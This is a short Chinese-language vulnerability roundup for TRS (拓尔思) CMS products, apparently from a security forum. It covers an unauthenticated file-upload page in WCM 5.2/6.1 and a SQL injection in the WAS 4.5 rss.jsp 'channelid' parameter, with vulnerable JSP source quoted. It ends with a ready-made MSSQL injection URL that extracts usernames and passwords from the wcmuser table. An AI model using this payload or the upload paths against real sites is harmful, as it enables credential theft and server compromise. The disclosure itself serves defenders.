TRS CMS（拓尔思CMS） 漏洞集合

TRS（拓尔思）WCM 文件上传漏洞

影响版本：

WCM5.2 WCM6.1

漏洞描述：

TRSWCM是拓尔思系列产品的重要组成部分，服务于信息资源的发布。

Lee在对WCM6.1（STD1091SP2）进行风险评估的时候发现，file_upload.html未做访问限制，攻击者可以匿名访问上传页面进行文件上传操作。

说明：

file/file_upload.html

infogate/file/file_upload.html

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 TRS（拓尔思）WAS 4.5 注入漏洞

2011-01-07 14:49

影响版本：

WAS4.5

漏洞描述：

TRSWAS是拓尔思系列产品的重要组成部分，服务于信息资源的发布。

Lee在对WAS4.5进行风险评估的时候发现，rss.jsp页面"channelid"参数未进行过滤。

说明：（TRS已发布补丁）

<%
 int defaultPagesize=20;//默认返回的订阅记录数
 int defaultChnid=65114;//默认频道号
 
 String SITE="";//当前站点
 String OUTLINE="outline_trs.jsp";//概览页面
 String LOGO="images/logo.gif";//Logo路径
 String TITLE="标题";//显示为标题的数据库字段名
 String AUTHOR="作者";//显示为作者的数据库字段名
 String DATE="日期";//显示为日期的数据库字段名
 String DESCRIPTION="正文";//显示为描述的数据库字段名

 try
 {
  String chnid=request.getParameter("channelid");
  if (chnid == null || chnid.length() == 0)
      throw new WASException("1001#频道号为空#rss.jsp#");
  String[] strSep = {",", ";"};
  String[] strChnids = WASTools.splitString(chnid, strSep);
  if(chnid==null)chnid=""+defaultChnid;
  int intChnid=0;
  try
  {
   intChnid=Integer.parseInt(strChnids[0]);
  }
  catch(Exception e){}
  int pagesize=0;
  try
  {
   pagesize=Integer.parseInt(request.getParameter("prepage"));
  }
  catch(Exception e)
  {
      pagesize=defaultPagesize;
  }
  String prepage=""+pagesize;
  if(SITE==null||SITE.trim().equals(""))
   SITE="http://"+request.getServerName()+":"+request.getServerPort()+request.getContextPath(); 
%>

 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------

TRS 是英文Text Retrieval System（文本检索系统）的缩写，据说是全文检索、搜索引擎、内容管理及知识管理核心技术和产品的统一，入选2008年度国家规划布局内重点软件企业，做某些渗透经常会碰到。

MSSQL版本：/wcm//help/wcmhelp_list.jsp?trandom=0.3575719151171357&JspUrl=http%3A%2F%2F9.9.9.9%2Fwcm%2F%23%2Floginpage.jsp'%20and%20(select%20top%201%20username%2bchar(124)%2bpassword%20from%20wcmuser)>0--
ORACLE及其它版本：一位一位试吧，没代码，比较麻烦。